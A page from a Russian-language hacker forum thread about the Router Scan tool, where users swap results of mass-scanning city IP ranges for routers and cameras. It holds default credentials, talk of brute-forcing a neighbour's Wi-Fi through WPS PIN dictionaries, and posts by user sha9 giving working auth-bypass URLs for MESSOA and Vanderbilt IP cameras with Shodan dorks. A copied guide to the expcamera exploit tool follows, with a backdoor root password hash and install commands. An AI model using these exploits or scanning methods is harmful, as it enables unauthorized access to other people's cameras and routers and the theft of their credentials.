прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. sharam

    sharam New Member

    Joined:
    2 Aug 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    главную страницу в смысле страницу авторизации?
     
    keshavredina likes this.
  2. sharam

    sharam New Member

    Joined:
    2 Aug 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    но если я сам открою этот ip то он просит пароль логин
     
    #6262 sharam, 2 Aug 2018
    Last edited: 2 Aug 2018
  3. miroslavvv

    miroslavvv Member

    Joined:
    20 Jul 2018
    Messages:
    104
    Likes Received:
    14
    Reputations:
    0
    Admin admin and user user
     
  4. sharam

    sharam New Member

    Joined:
    2 Aug 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    залейте как сайт встанет
    это всё из минска через ip можете место положение не пробивать это они все за nat
    завтра надеюсь ещё насканю (это только из двух диапозонов да ито интернет орубился на середине)
    p.s. предполедния строчка это камера случайно залил
     

    Attached Files:

    • 2.txt
      File size:
      2.3 KB
      Views:
      797
  5. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    вообще-то это билайн. разве-что в белоруссии тоже работает как провайдер
     
    #6265 sha9, 2 Aug 2018
    Last edited: 2 Aug 2018
  6. sharam

    sharam New Member

    Joined:
    2 Aug 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    я предположил что ты за nat
     
  7. sharam

    sharam New Member

    Joined:
    2 Aug 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    если ты про то что пропал интернет там другая при чина, хотя пока даже был интернет были time aut, ели это то как снизить количество потоков
     
  8. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    вообще-то не я. @ania01. а я просто пробил по 2ip
     
  9. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    для любителей

    эксплойт на камеру MESSOA NIC990. он-же подходит и на некоторые SIEMENS и тошиба
    MESSOA NIC990 IP-Camera auth bypass configuration download

    http://TARGET/cgi-bin/chklogin.cgi?file=config.ini

    shodan dork : /cgi-bin/chklogin.cgi
    на шодане правда нашел на скорую руку только сименсы. месоа не попались

    искомые параметры в строке USERID
    он правда старенький,но еще актуальный :)



    эксплойт на камеры Vanderbilt

    http://host:port/cgi-bin/readfile.cgi?query=ADMINID
    возвращает пас и логин админа
    шодан дорк: title:"Vanderbilt IP-Camera"
     
    #6269 sha9, 2 Aug 2018
    Last edited: 2 Aug 2018
    Ossen likes this.
  10. sharam

    sharam New Member

    Joined:
    2 Aug 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Это нормально что у меня сайт не грузит а через vpn грузит
     
  11. Terrifier

    Terrifier Member

    Joined:
    2 Aug 2018
    Messages:
    58
    Likes Received:
    59
    Reputations:
    0
    Соседские роутеры перекрывают собственный сигнал на 2.4
    Ходил просил поменять каналы/снизить мощность сигнала- безуспешно.
    Приходится самому....
    Подскажите, что можно сделать? может посмотреть где-то словари для брута данных моделей?
    [​IMG]
    [​IMG]
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Обычно пароль совпадает с WPS PIN. Брутить можно по соответствующему словарю.
     
    stuz0r and sha9 like this.
  13. Terrifier

    Terrifier Member

    Joined:
    2 Aug 2018
    Messages:
    58
    Likes Received:
    59
    Reputations:
    0
    Благодарю.
    WPS от модели не зависит, получается?

    И именно брутить или же использовать "Obtain key with WPS"?
     
  14. trew911

    trew911 New Member

    Joined:
    25 Oct 2016
    Messages:
    96
    Likes Received:
    3
    Reputations:
    0
    какие ещё порты могут использовать роутеры ? в нашем городе просканил весь город и что то мало результатов(

    Тюмень

    80
    8080
    1080
    443
    445
    554
    8000
    23
    53
     
  15. Payer

    Payer Elder - Старейшина

    Joined:
    14 May 2010
    Messages:
    1,061
    Likes Received:
    5,203
    Reputations:
    63
    На сайте http://3wifi.stascorp.com/stat есть статистика топ30 портов, на которых исследованы роутеры.
    А теперь внимание, вопрос: :D
    Какие еще порты можно использовать? Кроме пяти используемых вами.
     
    Kakoluk and sha9 like this.
  16. Pirnazar

    Pirnazar Banned

    Joined:
    28 Apr 2018
    Messages:
    194
    Likes Received:
    142
    Reputations:
    5
    Какие exploit-и использует RouterScan?
    Можно ли добавить свои?
     
    #6276 Pirnazar, 3 Aug 2018
    Last edited: 3 Aug 2018
  17. Puppet_Master

    Puppet_Master New Member

    Joined:
    2 Aug 2018
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Заметил, что роутеры на RouterOS, взламываются нормально, но в гуды их не кидает.
     
    miroslavvv likes this.
  18. Puppet_Master

    Puppet_Master New Member

    Joined:
    2 Aug 2018
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Мне на 161 попадаются, немного, но они есть.
     
    #6278 Puppet_Master, 3 Aug 2018
    Last edited: 3 Aug 2018
  19. sIm_sIm

    sIm_sIm New Member

    Joined:
    3 Aug 2018
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Если есть возможность, прошу сделать альтернативу для скачивания Router Scan-а. Уже который день не могу скачать ни с офф.сайта, ни с Яндекс-диска. Буду очень признателен.
     
  20. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    сорри за маленький офтоп...
    хорошее дополнение к роутерскану. для тех кто дружит с линуксом и не тыкает тупо на кнопки :) позволяет тестировать видеокамеры - expcamera.
    https://github.com/vanpersiexp/expcamera

    вторичный источник https://darkwebs.ws/threads/63210/


    Известны многие уязвимости видеокамер , которые делают последние доступными.
    При благополучном исходе , их закрывают и разрабатывают патчи.
    Но не в этом случае.

    Вы не ослышались , некоторые уязвимости до сих пор носят гордое звание 0 day.
    Почему так получилось? Ставили конечно в известность производителей.Ответа не получили.
    Да , многие модели вебок сюда тоже попадают.

    "После меня - хоть потоп"-Людовик 15
    (Главное продажи,пока показатели неплохи,продаём , пока есть спрос)
    " Я бы продал даже Лондон,если бы нашёлся покупатель"- Ричард Львиное Сердце

    И покупатели действительно находятся , только китайская школа пошла дальше.
    И заложила в инструмент эксплуатацию множества уязвимостей:

    1) Уязвимость Backdoor Account (CNVD-2017-02751)
    По умолчанию используется Telnet.
    Любой пользователь может получить доступ к логину с помощью следующих паролей учетной записи:
    Код:
    root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh
    2) Уязвимости RSA и раскрытия сертификата (CNVD-2017-02773)
    Код:
    /system/www/pem/ck.pem _здесь_содержимое_частных_ключей RSA Apple certificate
    3) Информация о предварительной авторизации и уязвимость утечки учётных данных(CNVD-2017-02774)

    При доступе к файлу конфигурации сервера путем предоставления пустых параметров ?loginuse? и ?loginpas?,
    злоумышленник может обойти программу аутентификации устройства.
    Таким образом , возможно загрузить файл конфигурации устройства без входа в систему.
    Эти файлы конфигурации содержат учетную информацию устройства , а также содержимое учетной записи FTP и SMTP.

    4) Уязвимость удаленного выполнения команды (CNVD-2017-02775)
    Она существует в inset_ftp.cgi в интерфейсе общего интерфейса FTP (CGI).
    Злоумышленник использует идентификатор администратора ftp
    для выполнения удаленной команды и дальнейшего получения прав root на сетевом устройстве.

    5) Удалённый доступ (CNVD-2017-02776)

    Получая доступ к URL-ссылке со специальными параметрами,
    злоумышленник может обойти программу проверки подлинности
    с полномочиями пользователя root и выполнить различный код в управлении видеокамеры.

    6) Уязвимость несанкционированного доступа CNVD-2017-02777) - содержательно звучит конечно,но ,тем ,не менее-
    Злоумышленник может получить доступ к встроенному серверу RTSP камеры через порт 10554
    и смотреть видео в реальном времени без проверки подлинности.

    7) Уязвимости функционального дизайна ‘Cloud’(CNVD-2017-02778)
    Функция, которая включена по умолчанию , позволяет потребителям использовать устройство в управлении сетью.
    Эта функция использует текстовые туннели UDP для обхода NAT и брандмауэров.
    Злоумышленник может злоупотреблять этой функцией, чтобы начать атаку грубой силы
    (brute-force attacks)

    В общем , более 1200 моделей различных видов продукции на рынке страдают от лазеек.
    Единственный совет на текущее время-отключить устройство от интернета.
    Здорово , Господа , не так ли ? Мне тоже нравится.

    Отступаем от лирики и переходим к сути.

    Автор замечательного инструмента,который позволяет тестировать видеокамеры-vanpersiexp
    Называется он expcamera.
    Как установить:

    Код:
    git clone https://github.com/vanpersiexp/expcamera.git
    cd Expcamera/
    chmod exploit_camera.py
    python exploit_camera.py -h -запуск с выводом опций
    ./exploit_camera.py -h -можно и так запустить.


    Я работал на Arch Linux , для остальных дистрибутивов возможно потребуется пакет python3
    И с ним же производим запуск в таком случае.

    Опции можно видеть на скрине.
    Предлагаю ознакомиться с ними самостоятельно.
     
    #6280 sha9, 3 Aug 2018
    Last edited: 3 Aug 2018
    Puppet_Master likes this.